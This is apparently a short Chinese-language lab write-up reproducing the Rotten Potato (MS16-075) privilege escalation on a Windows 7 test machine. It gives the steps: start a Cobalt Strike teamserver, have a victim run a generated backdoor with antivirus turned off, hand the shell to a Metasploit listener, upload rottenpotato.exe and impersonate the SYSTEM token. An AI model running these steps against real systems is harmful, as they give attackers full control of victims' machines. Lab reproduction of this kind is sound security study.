rottenpotato_ms16-075
烂土豆提权复现 ms16-075
环境: VPS一台,物理机一台,虚拟机kali一台,受害机win7一台
- 启动CS
命令: ./teamserver 公网IP,+登陆密码
- 客户端连接
CS服务器默认监听端口为50050,User自己设置一个就好
生成后门 模拟受害者点击
成功上线(未做免杀处理 因此我是将火绒关闭了的)
将这个shell转移到 msf meterpreter模块下
现在kali下面监听
点击受害机:右键 选择spawn 懂英文的都懂把
下面开始我们的 烂土豆提权
可以看到我们现在是 administrator 要提到system
- Use incognito (incognito)是获取令牌的,
相当于windows识别我们身份的标识 类似cookie
- List_tokens -u 列出当前的token
Delegation Tokens Avilable 可用的委托令牌
Impersonation Tokens Avilable 可用的模拟令牌
然后查看路径,将烂土豆 exe 上传
https://github.com/foxglovesec/RottenPotato
然后执行
Execute -cH -f ./rottenpotato.exe
然后执行窃取令牌命令
Impersonate_token “NT AUTHORITY\\SYSTEM”
一次不成功就多试几次。